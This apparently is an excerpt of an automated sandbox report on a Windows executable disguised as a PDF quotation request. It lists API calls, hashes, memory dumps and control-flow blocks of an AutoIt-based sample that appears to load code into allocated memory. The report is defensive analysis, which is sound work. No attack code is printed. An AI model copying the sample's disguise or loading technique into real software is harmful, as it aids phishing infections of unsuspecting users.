                                                                    • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\Quotation request -30112024_pdf.exe$CMDLINE$CMDLINERAW
                                                                    • API String ID: 3948761352-2045402639
                                                                    • Opcode ID: f22f4b8f7852214b0539a738b1855063d63c0007121df8553cfd6bf2c849bd2e
                                                                    • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                                                    • Opcode Fuzzy Hash: f22f4b8f7852214b0539a738b1855063d63c0007121df8553cfd6bf2c849bd2e
                                                                    • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __fread_nolock$_fseek_wcscpy
                                                                    • String ID: D)E$D)E$FILE
                                                                    • API String ID: 3888824918-361185794
                                                                    • Opcode ID: 013d3c16b5c27b8fe9bf46a980aed5baba8dd4ce194e3a208a92420200829254
                                                                    • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                                                    • Opcode Fuzzy Hash: 013d3c16b5c27b8fe9bf46a980aed5baba8dd4ce194e3a208a92420200829254
                                                                    • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                                                    • __wsplitpath.LIBCMT ref: 0040E41C
                                                                      • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                    • _wcsncat.LIBCMT ref: 0040E433
                                                                    • __wmakepath.LIBCMT ref: 0040E44F
                                                                      • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                      • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                    • _wcscpy.LIBCMT ref: 0040E487
                                                                      • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                    • _wcscat.LIBCMT ref: 00427541
                                                                    • _wcslen.LIBCMT ref: 00427551
                                                                    • _wcslen.LIBCMT ref: 00427562
                                                                    • _wcscat.LIBCMT ref: 0042757C
                                                                    • _wcsncpy.LIBCMT ref: 004275BC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                                                    • String ID: Include$\
                                                                    • API String ID: 3173733714-3429789819
                                                                    • Opcode ID: 5136d7da9c5bf0073b955d23f62714139c06d959485249d800a179de7f9c53a6
                                                                    • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                                                    • Opcode Fuzzy Hash: 5136d7da9c5bf0073b955d23f62714139c06d959485249d800a179de7f9c53a6
                                                                    • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • _fseek.LIBCMT ref: 0045292B
                                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                      • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                      • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                    • __fread_nolock.LIBCMT ref: 00452961
                                                                    • __fread_nolock.LIBCMT ref: 00452971
                                                                    • __fread_nolock.LIBCMT ref: 0045298A
                                                                    • __fread_nolock.LIBCMT ref: 004529A5
                                                                    • _fseek.LIBCMT ref: 004529BF
                                                                    • _malloc.LIBCMT ref: 004529CA
                                                                    • _malloc.LIBCMT ref: 004529D6
                                                                    • __fread_nolock.LIBCMT ref: 004529E7
                                                                    • _free.LIBCMT ref: 00452A17
                                                                    • _free.LIBCMT ref: 00452A20
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                                                    • String ID:
                                                                    • API String ID: 1255752989-0
                                                                    • Opcode ID: a26cdbb87b8a4757d36a46659d538ef3d0929563a566a4a09478a2d1b1ee3278
                                                                    • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                                                    • Opcode Fuzzy Hash: a26cdbb87b8a4757d36a46659d538ef3d0929563a566a4a09478a2d1b1ee3278
                                                                    • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                    • RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                    • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                    • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                    • ImageList_ReplaceIcon.COMCTL32(00A43660,000000FF,00000000), ref: 00410552
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                    • API String ID: 2914291525-1005189915
                                                                    • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                    • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                                                    • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                    • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                    • LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                    • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                    • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                    • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                    • RegisterClassExW.USER32(?), ref: 0041045D
                                                                      • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                      • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                      • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                      • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                      • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                      • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                      • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00A43660,000000FF,00000000), ref: 00410552
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                    • String ID: #$0$AutoIt v3
                                                                    • API String ID: 423443420-4155596026
                                                                    • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                    • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                                                    • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                    • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _malloc
                                                                    • String ID: Default
                                                                    • API String ID: 1579825452-753088835
                                                                    • Opcode ID: 3608772f5542b4c0ace6e4954aa65356d17f2b2606532b6ce7229574407e7cd0
                                                                    • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                                                    • Opcode Fuzzy Hash: 3608772f5542b4c0ace6e4954aa65356d17f2b2606532b6ce7229574407e7cd0
                                                                    • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 2137 40f5c0-40f5cf call 422240 2140 40f5d0-40f5e8 2137->2140 2140->2140 2141 40f5ea-40f613 call 413650 call 410e60 2140->2141 2146 40f614-40f633 call 414d04 2141->2146 2149 40f691 2146->2149 2150 40f635-40f63c 2146->2150 2151 40f696-40f69c 2149->2151 2152 40f660-40f674 call 4150d1 2150->2152 2153 40f63e 2150->2153 2156 40f679-40f67c 2152->2156 2155 40f640 2153->2155 2157 40f642-40f650 2155->2157 2156->2146 2158 40f652-40f655 2157->2158 2159 40f67e-40f68c 2157->2159 2160 40f65b-40f65e 2158->2160 2161 425d1e-425d3e call 4150d1 call 414d04 2158->2161 2162 40f68e-40f68f 2159->2162 2163 40f69f-40f6ad 2159->2163 2160->2152 2160->2155 2173 425d43-425d5f call 414d30 2161->2173 2162->2158 2165 40f6b4-40f6c2 2163->2165 2166 40f6af-40f6b2 2163->2166 2168 425d16 2165->2168 2169 40f6c8-40f6d6 2165->2169 2166->2158 2168->2161 2171 425d05-425d0b 2169->2171 2172 40f6dc-40f6df 2169->2172 2171->2157 2174 425d11 2171->2174 2172->2158 2173->2151 2174->2168
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __fread_nolock_fseek_memmove_strcat
                                                                    • String ID: AU3!$EA06
                                                                    • API String ID: 1268643489-2658333250
                                                                    • Opcode ID: b86aa73d20968581af46561266e5cfc6af67d3fa52a8a8a42fa2f0538c569cc0
                                                                    • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                                                    • Opcode Fuzzy Hash: b86aa73d20968581af46561266e5cfc6af67d3fa52a8a8a42fa2f0538c569cc0
                                                                    • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 2177 401100-401111 2178 401113-401119 2177->2178 2179 401179-401180 2177->2179 2181 401144-40114a 2178->2181 2182 40111b-40111e 2178->2182 2179->2178 2180 401182 2179->2180 2185 40112c-401141 DefWindowProcW 2180->2185 2183 401184-40118e call 401250 2181->2183 2184 40114c-40114f 2181->2184 2182->2181 2186 401120-401126 2182->2186 2194 401193-40119a 2183->2194 2187 401151-401157 2184->2187 2188 40119d 2184->2188 2186->2185 2190 42b038-42b03f 2186->2190 2191 401219-40121f 2187->2191 2192 40115d 2187->2192 2195 4011a3-4011a9 2188->2195 2196 42afb4-42afc5 call 40f190 2188->2196 2190->2185 2193 42b045-42b059 call 401000 call 40e0c0 2190->2193 2191->2186 2199 401225-42b06d call 468b0e 2191->2199 2197 401163-401166 2192->2197 2198 42b01d-42b024 2192->2198 2193->2185 2195->2186 2202 4011af 2195->2202 2196->2194 2204 42afe9-42b018 call 40f190 call 401a50 2197->2204 2205 40116c-401172 2197->2205 2198->2185 2203 42b02a-42b033 call 4370f4 2198->2203 2199->2194 2202->2186 2209 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 2202->2209 2210 4011db-401202 SetTimer RegisterWindowMessageW 2202->2210 2203->2185 2204->2185 2205->2186 2214 401174-42afde call 45fd57 2205->2214 2210->2194 2212 401204-401216 CreatePopupMenu 2210->2212 2214->2185 2228 42afe4 2214->2228 2228->2194
                                                                    APIs
                                                                    • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                                    • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                                    • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                                    • CreatePopupMenu.USER32 ref: 00401204
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                    • String ID: TaskbarCreated
                                                                    • API String ID: 129472671-2362178303
                                                                    • Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                                    • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                                    • Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                                    • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 2229 4115d7-4115df 2230 4115ee-4115f9 call 4135bb 2229->2230 2233 4115e1-4115ec call 411988 2230->2233 2234 4115fb-4115fc 2230->2234 2233->2230 2237 4115fd-41160e 2233->2237 2238 411610-41163b call 417fc0 call 41130a 2237->2238 2239 41163c-411656 call 4180af call 418105 2237->2239 2238->2239
                                                                    APIs
                                                                    • _malloc.LIBCMT ref: 004115F1
                                                                      • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                      • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                      • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                    • std::exception::exception.LIBCMT ref: 00411626
                                                                    • std::exception::exception.LIBCMT ref: 00411640
                                                                    • __CxxThrowException@8.LIBCMT ref: 00411651
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                    • String ID: ,*H$4*H$@fI
                                                                    • API String ID: 615853336-1459471987
                                                                    • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                    • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                                                    • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                    • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D

                                                                    Control-flow Graph (rendered graph not recoverable from the page; basic blocks 0x3262658-0x326295a, calls to 0x3260048, 0x3263568, 0x32637b8, 0x32635c8; API nodes in the graph: CreateFileW, VirtualAlloc, ReadFile, VirtualAlloc, CloseHandle, VirtualFree; executed / not-executed marking lost)
                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03262729
                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0326294F
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1301186731.0000000003260000.00000040.00000020.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3260000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFileFreeVirtual
                                                                    • String ID:
                                                                    • API String ID: 204039940-0
                                                                    • Opcode ID: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                                                    • Instruction ID: 03de9258a9b34da7dc0b766bc9acb6951a652727c3f4891b1b621312df08108b
                                                                    • Opcode Fuzzy Hash: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                                                    • Instruction Fuzzy Hash: F6A11774E11309EBDB14CFA4D894BEEB7B5BF48304F248599E601BB280D7799AC1CB64

                                                                    Control-flow Graph (rendered graph not recoverable from the page; basic blocks 0x4102b0-0x410384 and 0x425dfd-0x425e0e, calls to 0x433244, 0x412fba; API nodes in the graph: SHGetMalloc, SHGetDesktopFolder, SHGetPathFromIDListW; executed / not-executed marking lost)
                                                                    APIs
                                                                    • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                    • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                    • _wcsncpy.LIBCMT ref: 004102ED
                                                                    • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                    • _wcsncpy.LIBCMT ref: 00410340
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                                                    • String ID: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe
                                                                    • API String ID: 3170942423-40546275
                                                                    • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                    • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                                                    • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                    • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                                                                    APIs
                                                                      • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                                                      • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                                                      • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                    • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                                                    • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                                                    • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                                                    • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                                                    • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
